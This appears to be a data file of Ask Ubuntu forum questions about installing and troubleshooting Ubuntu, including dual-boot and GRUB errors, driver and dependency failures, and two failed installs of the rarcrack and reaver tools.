324931	the windows 8 and ubuntu 12.04 dual boot nightmare	i have done some research as to how to go about this dual-boot , and i am close , but i need some guidance with booting into windows 8 ( ubuntu is installed ) . i have a lenovo ideapad y510p . i will go over what i have done to dual-boot this laptop , with windows 8 pre-installed , with ubuntu 12.04 : i followed every instruction to the letter for the 97-vote response here , and everything worked fine up until after the repair boot section : installing on a pre-installed windows 8 system ( uefi supported ) i ran into the following error upon restarting after the repair boot section : error : invalid arch independent elf magic . this error ( a grub issue ) disabled me from booting into ubuntu : ( after a little googling , i followed the instructions in the reactivating grub 2 section to resolve the error : http : //kb.acronis.com/content/1686 i found a possible solution to fixing the windows 8 boot issue , and tried it : http : //webcache.googleusercontent.com/search ? q=cache : i9jmyxzzrpyj : askubuntu.com/questions/279275/dual-boot-problem-windows-8-ubuntu-12-04+ & cd=1 & hl=en & ct=clnk & gl=us & client=ubuntu i thought the above solution worked , but when i attempt to boot into windows 8 , i get the following missing file error : file : \boot\bcd status : 0xc000000e info : the boot configuration data for your pc is missing or contains errors . here is some other information that may be useful : i have 3 partitions devoted to ubuntu . the first , sda8 , has a flag bios_grub ( 1049 kb ) . the second , sda9 , is where everything else is ( 96.6 gb ) . the last , sda10 , is for swap ( 8299 mb ) . my question is : how do i fix the boot configuration for windows 8 ? any help would be greatly appreciated : ) update 1 : when i attempt to boot into uefi mode , i get the following error : invalid arch independent elf magic ( the same error i saw in step 2 ) . update 2 : a useful link here i found : dual booting ubuntu 12.04 : uefi and legacy so , this is my 4th time installing ubuntu on the laptop , and it looks like i need to install it in uefi mode . should i scrap it all again , and reinstall ? or is there any way of salvaging my installation ? at this point , i ca n't even boot into windows ( although i have an installation cd to fix the windows boot issue , that would ultimately screw over ubuntu ) . update 3 : after doing a little more browsing around , i found a cool way around this messy grub stuff , using refind . rod smith 's post here saved me ! installing ubuntu 12.04.02 in uefi mode now , i am able to dual-boot windows 8 and ubuntu and boot into both operating systems : ) i have another issue ( relating to the boot configuration in the bios ) that i will post as a separate question : )
324934	installing ubuntu on ssd with asus zenbook	i have a new asus zenbook ux32v with : 24gb sandisk ssd 500gb hitatchi it came with windows 8 but i 've successfully installed ubuntu 13.04 dual boot and everything works great . now i 've spent some time with it and loving ubuntu ( and hating win 8 ) i would like to go back and ditch the dual boot and just run ubuntu . boot time is sluggish and i really hate and have no need for windows 8 . looking at the disks tool on ubuntu i can see i have the above drives , the ssd seems to be taken up with : intelrst 6.4gb ( mountable ) hst 18gb ( unknown ) meanwhile the 500gb regular drive is filled with 9 partitions : system recovery microsoft reserved win 8 os data ubuntu file system linux swap file restore so basically i suspect ubuntu is not using the ssd at all . i 'd like to delete all partitions on the 24gb ssd and try format it then try and install ubuntu on that . i 've heard however this is meant as a cache drive and should n't be used for file system ? does anyone have any experience with this ? any knowledge of what the ssd is doing and if its safe to use it a main ubuntu file system ? i 'd really appreciate any guidance here . many many thanks .
324940	how to make `` file '' ( default file manager in ubuntu 13.04 ) as default file manager ?	before i use nautilus as my default file manager , i also have a file manager called file . i changed file with nautilus , but i do n't know how to change file as my default file manager again . can you guys help me out ? thanks in advanced
324945	ca n't install steam due to missing curl	hi i am new to ubuntu and when i try install steam , i get this- varun @ varun-xps-m1330 : ~/downloads $ sudo dpkg -i steam_latest.deb [ sudo ] password for varun : ( reading database ... 179346 files and directories currently installed . ) preparing to replace steam-launcher 1.0.0.39 ( using steam_latest.deb ) ... unpacking replacement steam-launcher ... dpkg : dependency problems prevent configuration of steam-launcher : steam-launcher depends on curl ; however : package curl is not installed . steam-launcher depends on jockey-common ; however : package jockey-common is not installed . dpkg : error processing steam-launcher ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : steam-launcher
324947	grub says unknown file system . what do i do ?	i have a dual boot pc with windows xp and lubuntu . what happened is , i tried to uninstall lubuntu by trying to format the root drive while using lubuntu . it just said error , so i looked for other ways to uninstall lubuntu . i got what i wanted , but when i restarted , i got : error : unknown file system . grub rescue > i tried ls , and got all those hard drive partitions , but none has the root directory . what do i do ?
324954	flash player not working in 13.04	just installed 13.04 . it say that version flash player 11.2 is installed , but i ca n't get it to work . anyone have an idea how to fix it ?
324957	support for opengl 4.3 for nvidia on 12.04.2 ( or any version ) ?	are the opengl 4.3 features of the latest nvidia cards supported yet in the drivers ?
324966	why is directory /home/david/workspace/ not present ?	i installed ubuntu server 12.04.2 lts from cd on a new box , and ran the following commands : sudo apt-get update sudo apt-get upgrade sudo apt-get install ubuntu-desktop this created a directory /home/david/workspace/ i later made an error and wanted to start over , so i reinstalled ubuntu server 12.04.2 once again from cd , formatting the whole drive , and again ran the three above apt-get commands . now there is no directory /home/david/workspace/ how could the first time create this directory , but the second time not ?
324969	ca n't boot windows after installing ubuntu	okay , so today i installed ubuntu . at the start of the installation , the installer did n't recognise windows so i had to choose 'something else ' and create swap and root partitions . i then installed and now ubuntu is working perfectly . however when i restart it automatically starts ubuntu ! i 'm not given a start-up menu . i have no idea what to do as i realise that even with a start-up menu , windows wo n't be recognised . does anyone know what i can do ? thank you ! ! edit : i think the answer is here no windows 7 entry in grub after installing ubuntu but i just do n't understand it . from vincenzo : `` in grub customiser use preferences button , than choose advanced . from there change a default entry to number which corresponds to your windows partition . ( a numbering begins from zero ( 0 ) ) '' can anyone explain what he means ? where can i find this number ? pleease help !
324971	new to ubuntu and i need some help	alright so i have a p.o.s . toshiba laptop that 's currently running windows 7 os . things were great up until sometime last month it started crashing in the middle of work or just browsing . i 'm quite fed up with windows as well as microsoft . i figured i could just erase windows 7 and replace it with ubuntu . now i 'm sure this can not be done but if it is possible please let me know . if not , that 's fine i could then just make a partition and running through that . but , here 's the problem , i ca n't install it to make a either decision . i have a usb thumb drive that has ubuntu 12.04 installer on it and it 'll boot from that with no problem . i can even play around on it a bit . when i try to install it comes up with the 'want to try ' or 'want to install ' , i click install . from there it shows me the options 'connect to internet ' or 'do n't connect ' . i click connect and get everything ready to go . when i click continue , i get the little pinwheel loading cursor and nothing else . it just stays like that for hours . i ran it for about four hours . if anyone could please let me know if it may be a faulty usb drive , file , etc . my wife writes and she ca n't if windows keeps crashing . open to any suggestions ... thank you for your time and patience .
324979	problem installing some icon themes	downloaded a few icon themes . some of the themes instructed me to move the icon folder to the /.icons directory . after that the instructions state to cd to the /.icons/iconthemefolder . i 'm issue the command to move the icon folder to the /.icons directory but when i issue the command to cd to the icons folder within the /.icons directory i get the error message 'no such file or directory ' . am i not really moving the icon folder to the /.icons directory ? i have to use sudo or root terminal to move the file . when i try to open the /.icons directory i get 'permission denied ' . so i ca n't really tell if the icon folder is really there or not . i 'm running xubuntu 12.04 64-bit .
324981	user disappeared from login screen	i can not log in on the graphical login since my username does not appear as a possible choice . what dictates which users appear there ? i just changed my uid from 1000 to 872 while being logged in as root using usermod . all went smooth : entry in /etc/passwd was amended , file ownership in /home/mysloginname was changed . i can login on a text console and everything is fine . however the graphical display does not offer my username . what do i need to change ?
324984	does running linux off a usb drive require a proper functioning internal hard disk	i have a laptop with windows 7 installed on it . somehow my internal hard disk failed and now windows wont boot anymore ( it wont let me repair or install a new copy of windows ) . so i tried to run linux off a usb pen drive . however after a few messages the laptop hangs with a blank screen . i was just wondering if i need a fully functional internal hard-disk to run linux off a pendrive
324986	removing gnome panel to the right on ubuntu 10.04	i accidentally added a panel by right clicking on the bottom tool bar and clicking add panel . i then tried to delete this , but , the option does not appear when right clicking . i have looked in .gnome and a number of other configuration files , to see if i can remove this , but , i have not had any luck doing so . any suggestions . i would like to just remove the panel .
324990	ca n't connect my usb device	i have a steno machine that i 'm trying to connect to my computer with free steno software i downloaded called plover ... it 's connected through a serial cable and usb-to-serial converter , and my computer knows it 's there but for some reason the software is n't connecting to it ? ? and i 'm so confused . i 'm trying to connect it to the right port ( /dev/ttyusb0 ) so i 'm really not sure what the problem is . [ 6737.415564 ] usb 2-1.2 : new full-speed usb device number 4 using ehci_hcd [ 6737.501784 ] usb 2-1.2 : new usb device found , idvendor=067b , idproduct=2303 [ 6737.501806 ] usb 2-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 6737.501823 ] usb 2-1.2 : product : usb-serial controller d [ 6737.501836 ] usb 2-1.2 : manufacturer : prolific technology inc. [ 6737.502470 ] pl2303 2-1.2:1.0 : pl2303 converter detected [ 6737.504642 ] usb 2-1.2 : pl2303 converter now attached to ttyusb0 is it maybe a permissions problem ? ( precise ) root @ localhost : /proc/tty/driver # ls -l total 0 -r -- r -- r -- 1 root root 0 jul 26 09:00 usbserial : cd /dev : /dev $ ls -l crw-rw -- -- 1 root 402 188 , 0 jul 26 08:55 ttyusb0 do n't know . i also get this when i run the program from terminal : xlib.xauth : warning , no xauthority details available xlib.protocol.request.queryextension does that mean anything ?
324992	when i try to install ubuntu , the screen res is too low to use the installer	i have an acer aspire v3 with 8gb ram , 1tb hdd , nvidia geforce 650m 2gb graphics , 17.3 '' screen with 1600x900 res . when i use grub i cant boot it without nomodeset . when i get to the graphical installer , the screen resolution is 640 x 480 and i cant change it . the buttons are too far down to be able to press them . please help .
324994	wifi not working on latitude d620	i have an old dell latitude d620 that i installed ubuntu 12.04 on . i had originally installed the ubuntu 12.04 server configuration , than added in the desktop stuff later with `` apt-get install ubuntu-desktop '' . if i have a hard-wired connection , the wifi also works , at least as far as seeing my wifi sid and authenticating via wpa . but , if i disconnect the wired connection and reboot , i do n't get any networking at all . during boot , i get console messages saying , `` waiting for network configuration ... '' , followed by `` waiting up to 60 more seconds for network configuration ... '' . when the system finally comes up , ifconfig shows eth0 up , and lists wan0 , but it 's not up . there 's no wifi widget in my toolbar . and , if i open the network control panel , i get a frowny face and `` the system network service are not compatible with this version '' . any idea what 's wrong ?
324998	installing the bootloader	i have a new lenovo idea pad ( u410 ) with windows 8 pre-installed . i 've partitioned the hard drive and i 'm able to install ubuntu without errors . i 've done this a couple times , but i 'm not sure where to place the boot loader . i have an ssd + standard hd ( 1tb ) on my computer . i believe windows 8 's loader is on the 1 tb drive . i 've tried putting the ubuntu loader on both drives and while it says there was n't any errors , i 'm unable to load directly into it . i 've tried using easybcd but every thing i try there says that it was unable to load windows . right now , in order to get into ubuntu , in windows i have to go to settings > power > shift + restart > troubleshoot > advanced options > uefi firmware settings > restart . then when it restarts i am able to check a separate drive ( the ssd ) and that loads grub . then i can choose ubuntu . if i try choosing windows from grub it errors out and i have to restart the computer . this is why i do not want to change the bios to load from the ssd first . so how do i properly clean this mess up and allow me to duel boot ? i do n't care if i do that through grub or through the windows loader . thanks .
325004	ubuntu 12.04 acer idea issues	so i was trying to install ubuntu 12.04 lts onto my acer idea 510 . i succeeded to install it , though everytime i try to install the wireless and graphics card drivers it crashes and send this message that it `` ca n't enumerate usb device port 3 '' over and over again . i tried to reinstall it several times with no success . do you have any idea ? thank you very much for you 're help ! ! !
325006	how to go to the location of a folder	i 'm a really noob in ubuntu and i want to know how to go to the location of a folder . i recently downloaded some `` custom themes '' for my python idle and i want to install them . but i do n't know how to access to the python folders . i 've read that these folders are located in /usr/bin but i do n't know how to go there . could you please help me ? thank you guys i have ubuntu 13.04
325008	installation of postgis 2 , postgresql 9.1 dependency errors	a couple of months ago i installed postgesql 9.1 and postgis 2.0 on my ubuntu 12.04 server . now i ca n't do any apt-get upgrades or installs because of this installation with broken libgdal1 dependencies . i 've tried sudo apt-get autoremove and sudo apt-get install -f like it suggests but it wo n't work and just gives me the following errors : dpkg : dependency problems prevent configuration of postgis : postgis depends on libgdal1 ( > = 1.9.0 ) ; however : package libgdal1 is not installed . postgis depends on postgresql-9.1-postgis ; however : package postgresql-9.1-postgis is not installed . dpkg : error processing postgis ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : postgis e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i feel like i 'll need to backup and restore my database just to get apt-get working again which is absolute craziness . these are the times when i really miss working with windows installations . any help/suggestions would be greatly appreciated .
325011	if i install ubuntu over pclinuxos will i loose my files ?	i am currently running pclinuxos on my dell dimension 4500 . i 'm having problems with pclinux and would like to install ubuntu over it . if i do that , will my files be retained ? is there anything i need to do to ensure that they are not lost ?
325012	how do i set up pretty printing gdb 7.5	i thought gdb 7.0 and higher has pretty printing included in it but i might be wrong ? can someone point me to the correct way to use this ? do i need to create a .gdbinit file for this ? i tried copying one from stackoverload but it was giving me errors and then i read that pretty printing should be included in 7.0 and higher . can someone please school me on this ? when i print a vector i get the following , is there a way to get a better layout ? the vector has data but it shows no data fields in the output below . ( gdb ) p data $ 4 = ( std : :vector < std : :basic_string < char , std : :char_traits < char > , std : :allocator < char > > , std : :allocator < std : :basic_string < char , std : :char_traits < char > , std : :allocator < char > > > > & ) @ 0x7fffffffdfe0 : { < std : :_vector_base < std : :basic_string < char , std : :char_traits < char > , std : :allocator < char > > , std : :allocator < std : :basic_string < char , std : :char_traits < char > , std : :allocator < char > > > > > = { _m_impl = { < std : :allocator < std : :basic_string < char , std : :char_traits < char > , std : :allocator < char > > > > = { < __gnu_cxx : :new_allocator < std : :basic_string < char , std : :char_traits < char > , std : :allocator < char > > > > = { < no data fields > } , < no data fields > } , _m_start = 0x6082d0 , _m_finish = 0x6082d8 , _m_end_of_storage = 0x6082d8 } } , < no data fields > }
325017	partition deallocated	i need some urgent help here . i had 3 partitions on my computer , one for windows , the other for ubuntu and the last one for files . i was going to re-install windows and from the windows boot cd i chose to format the partition with the old version . then after i reboot i noticed that my ubuntu partition was kind of deallocated and i ca n't access anymore . i do n't think it 's a problem with grub . bellow is the output from fdisk device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 204802047 102041600 7 hpfs/ntfs/exfat /dev/sda3 204802048 850450485 322824219 7 hpfs/ntfs/exfat /dev/sda4 850452478 976771071 63159297 5 extended /dev/sda5 968960000 976771071 3905536 82 linux swap / solaris disk /dev/sdb : 32.0 gb , 32015679488 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62530624 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008c308 device boot start end blocks id system /dev/sdb1 * 63 62524979 31262458+ c w95 fat32 ( lba ) does anybody know how can i at least get my files from the home folder ? i do n't mind reinstalling ubuntu if i get those files back ... thank you in advance
325023	kubuntu white stripes ubuntu 12.04	i made a clean installation of ubuntu 12.04 and added the kubuntu desktop . now i have white stripes at the bottom of the desktop ( in the task bar ) they are paired and in a regular distance to each user . before this installation , i installed kubuntu ( directly ) , it did not have these stripes ( and no working usb , therefore i choose to install ubuntu first and add kubuntu afterwords ) . i have a graphics card on the chip and an additional nvidia card , which is not used as standard . there are no drivers listed in 'additional drivers ' . what could i do to 'remove ' these stripes ? they go away when clicking on the task bar or any other button . my system specifications : i7 3632qm nvidia geforce 710m 16 gb memory 500 gb ssd thanks for an answer ! here is a screenshot of the issue : it seems that the stripes ( and also the chosen background ) disappear , when connecting a second screen . with a connected screen i have the typical ubuntu background and no stripes .
325030	only seeing the current computer listed in the sync between computers section in software center	i have enabled sync between computers using the same ubuntu account on three different computers . when i open sync between computers in software center i only see the current computer . i used to be able to see the two other machines and could access a list of the packages i had installed on the other systems . i have the same problem on all three computers . how can i resolve this problem ?
325034	windows wo n't boot file : \ubuntu\winboot\wubildr.mbr	i am really new to ubuntu s i do n't normally use it but i have to install it on my laptop for my computer course . my laptop runs on windows 7 and it is pretty new . i downloaded and installed ubuntu via windows installer from the website , however , when i restarted the computer and tried to boot the computer using ubuntu , the following message appears : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and the click `` next . '' 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc0000098 info : the selected entry could not be loaded because the application is missing or corrupt . as i said , i am really new to ubuntu . i have searched up the issue and found some solutions but they sound quite complicate and i have no idea what to do . can somebody help me please ? thank you very much .
325037	installing nvidia drivers on ubuntu 12.04	so , i 've been trying to run steam on my computer ( hp pavilion dv7 , ubuntu 12.04 ) , but i end up with the following error : xlib : extension `` glx '' missing on display `` :0 '' . after some research , i understood it has something to do with nvidia drivers i should install . i ended up on this page : https : //help.ubuntu.com/community/binarydriverhowto/nvidia , saying i should use this command line : jockey-text -e xorg : nvidia_current here is my question : what do i replace `` nvidia_current '' with ? or how do i find it out ? i tried going in `` system settings '' - > `` additional drivers '' , but all it shows is that i have a `` broadcom sta wireless driver '' installed , it says nothing about gpu drivers . excuse my noobness , i 'm a complete beginner and new to ubuntu . oh , and my gpu is an nvidia geforce gt630m - 2gb any help will be greatly appreciated !
325038	no sound in headphones	i have a lenovo g700 model , and recently installed ubuntu 12 , but there is no sound in the headphones , though the laptop speakers are working fine . sometime i got sound in headphones and laptop speakers together , but i 'm unable to figure , how can i get the sound only in the headphones . in sound settings , under the output tab , there is an option for analog output only . i have windows also in the same system , in which everything is working fine . thanks !
325043	rarcrack installation issues	i 'm pretty new to linux . i currently operate on ubuntu 10.04 desktop . anyhow , a while ago while being slightly intoxicated i have encrypted a .rar file with a password and deleted the original files . i now really want to get these files back so i have downloaded the latest release of rarcrack ( 0.2 ) . i can not seem to install it ! here 's what happens when i go to the rarcarck-0.2 folder and type `` make '' as indicated on their website . root @ linux : ~/rarcrack-0.2 # make gcc -pthread rarcrack.c `xml2-config -- libs -- cflags` -o2 -o rarcrack /bin/sh : xml2-config : not found in file included from rarcrack.c:21 : rarcrack.h:25:48 : error : libxml/xmlmemory.h : no such file or directory rarcrack.h:26:27 : error : libxml/parser.h : no such file or directory rarcrack.h:27:36 : error : libxml/parserinternals.h : no such file or directory rarcrack.h:28:25 : error : libxml/tree.h : no such file or directory rarcrack.h:29:28 : error : libxml/threads.h : no such file or directory rarcrack.c:30 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘pwdmutex’ rarcrack.c:33 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘status’ rarcrack.c:35 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘finishedmutex’ rarcrack.c : in function ‘savestatus’ : rarcrack.c:46 : error : ‘xmlnodeptr’ undeclared ( first use in this function ) rarcrack.c:46 : error : ( each undeclared identifier is reported only once rarcrack.c:46 : error : for each function it appears in . ) rarcrack.c:46 : error : expected ‘ ; ’ before ‘root’ rarcrack.c:47 : error : expected ‘ ; ’ before ‘node’ rarcrack.c:48 : error : ‘xmlchar’ undeclared ( first use in this function ) rarcrack.c:48 : error : ‘tmp’ undeclared ( first use in this function ) rarcrack.c:49 : error : ‘status’ undeclared ( first use in this function ) rarcrack.c:50 : error : ‘root’ undeclared ( first use in this function ) rarcrack.c:52 : error : ‘finishedmutex’ undeclared ( first use in this function ) rarcrack.c:53 : error : ‘node’ undeclared ( first use in this function ) rarcrack.c:55 : error : ‘pwdmutex’ undeclared ( first use in this function ) rarcrack.c:56 : error : expected ‘ ) ’ before ‘xmlchar’ rarcrack.c:66 : error : expected ‘ ) ’ before ‘xmlchar’ rarcrack.c : in function ‘loadstatus’ : rarcrack.c:87 : error : ‘xmlnodeptr’ undeclared ( first use in this function ) rarcrack.c:87 : error : expected ‘ ; ’ before ‘root’ rarcrack.c:88 : error : expected ‘ ; ’ before ‘node’ rarcrack.c:89 : error : ‘xmlparserctxtptr’ undeclared ( first use in this function ) rarcrack.c:89 : error : expected ‘ ; ’ before ‘parserctxt’ rarcrack.c:96 : error : ‘status’ undeclared ( first use in this function ) rarcrack.c:99 : error : ‘root’ undeclared ( first use in this function ) rarcrack.c:103 : error : ‘parserctxt’ undeclared ( first use in this function ) rarcrack.c:104 : error : ‘node’ undeclared ( first use in this function ) rarcrack.c:108 : error : ‘xml_substitute_both’ undeclared ( first use in this function ) rarcrack.c:127 : error : ‘finishedmutex’ undeclared ( first use in this function ) rarcrack.c : in function ‘nextpass’ : rarcrack.c:170 : error : ‘pwdmutex’ undeclared ( first use in this function ) rarcrack.c : in function ‘status_thread’ : rarcrack.c:182 : error : ‘finishedmutex’ undeclared ( first use in this function ) rarcrack.c:188 : error : ‘pwdmutex’ undeclared ( first use in this function ) rarcrack.c : in function ‘crack_thread’ : rarcrack.c:206 : warning : comparison between pointer and integer rarcrack.c:208 : error : ‘finishedmutex’ undeclared ( first use in this function ) rarcrack.c:205 : warning : ignoring return value of ‘fgets’ , declared with attribute warn_unused_result rarcrack.c : in function ‘init’ : rarcrack.c:250 : error : ‘pwdmutex’ undeclared ( first use in this function ) rarcrack.c:251 : error : ‘finishedmutex’ undeclared ( first use in this function ) rarcrack.c:283 : warning : format ‘ % s’ expects type ‘char *’ , but argument 3 has type ‘char ( * ) [ 300 ] ’ rarcrack.c:317 : warning : ignoring return value of ‘fscanf’ , declared with attribute warn_unused_result rarcrack.c : in function ‘main’ : rarcrack.c:351 : error : ‘status’ undeclared ( first use in this function ) rarcrack.c:353 : error : ‘pwdmutex’ undeclared ( first use in this function ) rarcrack.c:354 : error : ‘finishedmutex’ undeclared ( first use in this function ) make : *** [ all ] error 1 and here 's what happens when i type `` make install '' . root @ linux : ~/rarcrack-0.2 # make install install -s rarcrack /usr/bin/bin install : can not stat `rarcrack ' : no such file or directory make : *** [ install ] error 1 any help would be very appreciated . thanks in advance !
325047	mac os x dual boot with encrypted ubuntu lvm	i 'd like to setup my mac book pro with dual boot ubuntu 13.04 & os x mountain lion . because the machine contains corporate date , i need to encrypt both operating systems . with mac i can use filevault . for ubuntu i need an encrypted lvm ( am i right ? ) . i ca n't setup ubuntu with lvm because it wipes my entire disk and can only use the whole disk to init lvm . i need both aside , so this does n't work for me . is there any way to encrypt the ubuntu partition if there is no lvm ? can i setup lvm and not use the entire disk ? greetings jony
325048	cleaning up and changing the efi boot order permanently using eifbootmgr	alright , so after a few days of figuring out how to dual-boot windows 8 and ubuntu 12.04 , i made refind my default bootloader . my problem now lies in my efi setup : ubuntu ( st1 ... do n't feel like typing that out lol ) windows boot manager ( st1 ... ) windows boot manager ( st1 ... ) efi network 0 for ipv4 efi network 0 for ipv6 here is the thing : 1 and 2 do not work , but i do n't want to get rid of them for now . 3 is where my refind is , and i want this to be at the top . every time i turn on the computer , this is the default boot order . i can change it each time i boot up , but i would prefer not to do so . i noticed that there was some program eifbootmgr , but i am not exactly sure how to use it . basically , i want to permanently reorder the list to : 3,4,5,1,2 . if i could get a guide as to how to do so , i would appreciate it : ) update : rod , so i took screenshots of what happened , and i had a weird result in the boot menu ...
325051	how to reboot after resetting password	recently i had a problem with the authentication in ubuntu 12.04 . i managed to solve the problem by using this procedure but after successfully changing my password , i could n't find a way to reboot my laptop . i wonder how can one reboot in that freakish environment ?
325059	command to copy from a file	lets suppose that i have a file named `` foo '' . for example , i can copy its contend doing : gedit foo ctrl+a ctrl+c alt+f4 but , i wonder if i can do the same thing with something like : command foo thanks in advance ! : )
325064	problems with shutdown from command line	whenever i attempt to shutdown my dell inspiron 1545 laptop from the command line with sudo shutdown now i get the following error after the ubuntu shutdown screen closes : could not get system bus . make sure message bus daemon is running ! message : failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory i have actually installed ubuntu several times on this laptop but always have this strange error . i checked out the directory /var/run/dbus and system_bus_socket is within that directory so i am a bit at a loss for ideas on why it wo n't recognize the existence of the socket . i can however shutdown from the gui with no problems . any thoughts on why the sudo shutdown now command is n't working properly ?
325068	ubuntu 13.04 - driver/header/icon problems resulting in weird theme loss ?	so , after trying to setup bumblebee , i did mess up a lot of my ubuntu installations , including installing and taking down nvidia drivers - resolving mirrored and flipped text issues , and well - i managed to do all that , except that now icons and most of gui elements are just black and white . i would guess it 's related to linux-headers - as the problem appeared somewhere in that timespan . also it could be with 3d acceleration related things ? i 'm not sure , my first week on linux . so - now it looks like this . i 've tried reinstalling both compiz / unity following instructions around . tried fallback to gnome ( no idea ) , did n't help either . any solutions ? loading ccsm from terminal gives this : gtk-warning : unable to locate theme engine in module_path : `` hcengine '' , -- lshw -c video information *-display description : vga compatible controller product : gf108m [ geforce gt 540m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 -- *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory : d1400000-d17fffff memory : c0000000-cfffffff ioport:4050 ( size=8 ) -- unity_support_test opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ironlake mobile opengl version string : 2.1 mesa 9.1.3 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
325070	impossible to install linux on notebook g75vx with win8	i purchased asus notebook g75vx with win8 preinstalled . i have to install linux on it ( dual-boot with win8 preferably ) . i have read a lot on this ( i am new to all this ) but nothing has yet worked for me . all the illustrating images are at : http : //www.giref.ulaval.ca/~zkavazov/asus_tech_support.zip 0 ) i disabled secureboot ( fastboot ) + burned opensuse 12.3 iso dvd + burned ubuntu 12.04 iso dvd . 1 ) i followed all the steps proposed by http : //www.tweakhound.com/2013/03/18/dual-boot-opensuse-12-3-and-windows/ and used easybcd without any success . 2 ) opensuse 12.3 -- kernel=default : : : : : : : : : : : : trying to install it with kernel at default : i get nowhere very quickly . i do not even get to the first step of the installation ( choice of language ) . the screen images that i get while trying to boot from dvd and installing opensuse for the first time are labeled opensuse_dvd_1.jpg to opensuse_dvd_8.jpg . 3 ) opensuse 12.3 -- kernel=safesettings : : : : : : : : : : : : trying to install it with kernel at safesettings : i almost got it : ) . note that i would probably end up without graphics if i get linux to work under safesettings -- just a hypothesis . i went through the installation process following tweakhound link above and using easybcd . now , the windows boot manager sees opensuse 12.3 : i have a choice to start win8 or opensuse . windows keeps booting just fine . however , it refuses to boot into opensuse . it gives me a message : file : \nst\autoneogrub0.mbr status : 0x000007b info : operating system could not be loaded because a required file is missing or contains errors i verified more then once and the file c : \nst\autoneogrub0.mbr is there ... . 4 ) ubuntu 12.04 lts -- - dvd : : : : : : : : : : : : i also tried ubuntu 12.04 lts . it would not start the installation from the dvd . pictures of the screen related to this attempt are labeled ubuntu_dvd_1.jpg ; ubuntu_dvd_2.jpg ; ubuntu_dvd_3.jpg . 5 ) ubuntu 12.04 lts -- - exe : : : : : : : : : : : : finally , i tried to install ubuntu just as i would for any other software under windows by double-clicking on wubi.exe file ( win8 was running , i wen to computer -- > dvd and simply double-clicked on *.exe file ) . it went just fine . it finished the installation . i restarted the laptop . it presented a dual-boot screen ( never saw this one before -- all blue and neat ) offering the choice between win8 and ubuntu . again , win8 boots fine but ubuntu would not . it gives the same kind of error as for opensuse : could not find ubuntu mbr file . pictures of the screen are labeled ubuntu_exe_1.jpg ; ubuntu_exe_2.jpg ; ubuntu_exe_3.jpg . of course , the ubuntu mbr file is at its c : location and is not empty . i am pretty desperate at this point . any help and insight would be extremely appreciated . this wonderful asus monster machine is absolutely useless to me without linux in it since all the numerical codes that i will use for my calculations run on linux . many thanks ! !
325072	problems with steam	i am having troubles with my steamcmd . i can not get the steam cmd start code to work and i can not get garry 's mod to open on it either . i have tried things such as touch $ home/.steam/steam/steam_install_agreement.txt and sudo apt-get purge steam mv .steam/steamapps ~/downloads/ rm -rf .steam* .local/share/steam wget http : //media.steampowered.com/client/installer/steam.deb sudo dpkg -i steam.deb errors : http : //pastebin.com/ghrcazup
325073	how to create ubuntu liveusb manually	the thing i 'm trying to do : make a bootable usb with two partitions ( bootable fat32 and ntfs for data ) . ( done ) install grub2 to fat32 partition . ( done ) make fat32 partition multiboot , with persistent installed ubuntus . the last one should n't be that hard , but now my head is about to blow ... i ca n't find anywhere step-by-step instructions on how to do persistent installation of ubuntu on one partition and not in the root directory ( in ubuntu12.04 folder for example ) . at this time i 've gathered information from it looks like all internet and here what i 've done : extracted ubuntu 12.04 livecd iso into /ubuntu12.04 directory . created /ubuntu12.04/casper-rw file using dd and mkfs.ext2 it . added menuentry to grub.cfg menuentry `` run ubuntu 12.04.2 live '' { linux /ubuntu12.04/casper/vmlinuz file=/ubuntu12.04/preseed/ubuntu.seed boot=casper persistent rw quiet splash -- initrd /ubuntu12.04/casper/initrd.lz } but result are always the same : ( initramfs ) : unable to find a medium containing a live file system . please help . where should i place casper-rw file to make initramfs found it ? or anything to get what i need . thanks in advance . p.s . sorry for my bad english .
325074	wine 1.6 in ubuntu software center	so i downloaded wine from the software center and it works very well . unfortunately , the software center does not offer the latest version . my question is ; when will the version be bumped to 1.6 ?
325099	unable to install package through terminal ( apt-get )	root @ ubuntu-pc : ~ # reaver the program 'reaver ' is currently not installed . you can install it by typing : apt-get install reaver root @ ubuntu-pc : ~ # sudo apt-get install reaver reading package lists ... done building dependency tree reading state information ... done e : unable to locate package reaver root @ ubuntu-pc : ~ # moreover , i installed this before like that , now not work
